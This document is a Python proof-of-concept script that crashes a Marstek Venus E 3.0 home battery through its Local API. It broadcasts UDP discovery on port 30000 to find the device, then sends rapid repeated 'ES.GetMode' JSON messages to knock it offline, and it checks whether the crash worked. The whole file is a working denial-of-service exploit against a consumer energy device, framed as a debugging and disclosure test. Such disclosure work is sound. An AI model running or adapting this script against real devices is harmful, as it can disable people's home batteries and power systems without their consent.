#!/usr/bin/env python3
# MIT License
#
# Copyright 2026
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the “Software”), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is furnished
# to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# Marstek Venus E 3.0 Local API remote crash proof-of-concept
#
# WARNING: This script is designed to trigger a malfunction of the Marstek Venus E 3.0.
# USE WITH CAUTION FOR DEBUGGING PURPOSES ONLY!
import socket
import json
import time
# Port of Local API
api_port = 30000
# Identity of the battery to crash, fill in the BLE id here.
test_target = "VenusE 3.0-18cedf9946a3"
# JSON messages to discover devices
discover_msg = {
"id": 0,
"method": "Marstek.GetDevice",
"params": {
"ble_mac":"0"
}
}
# JSON message to send to crash device
test_msg = {
"id": 1,
"method": "ES.GetMode",
"params": {
"id": 0
}
}
# Function to perform device discovery, used for finding the IP of the target device and checking if the crash occured.
def discover_device(test_target, api_port):
#Discover device
print("Starting device discovery")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.settimeout(1)
for i in range(10):
print("Sending discovery message...")
sock.sendto(json.dumps(discover_msg).encode("utf-8"), ("255.255.255.255", api_port))
try:
data, addr = sock.recvfrom(1024)
response = json.loads(data.decode())
print("Received: " + str(response))
if response['src'] == test_target:
print("Discovered target battery " + test_target + " at " + response['result']['ip'])
return response['result']['ip']
except socket.timeout:
continue
print("Failed to discover device. Did it crash?")
return None
# Step 1. Use discovery message to find the target device
target_ip = discover_device(test_target, api_port)
# Step 2. Send the same message a few times in quick succession, triggering the crash
target_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
target_socket.settimeout(1)
print("Sending repeated messages")
for i in range(10):
target_socket.sendto(json.dumps(test_msg).encode("utf-8"), (target_ip, api_port))
print(".", end='', flush=True)
time.sleep(0.1)
# Step 3. Wait a few seconds
print("\nWaiting 5 seconds before checking if device has crashed")
time.sleep(5)
# Step 4. Check if the device is still online. If not, the device has crashed and fails this test.
print("Checking is device is online.")
result = discover_device(test_target, api_port)
if result == None:
print("Device has gone offline. Test failed.")
else:
print("Device has remained online. Test passed!")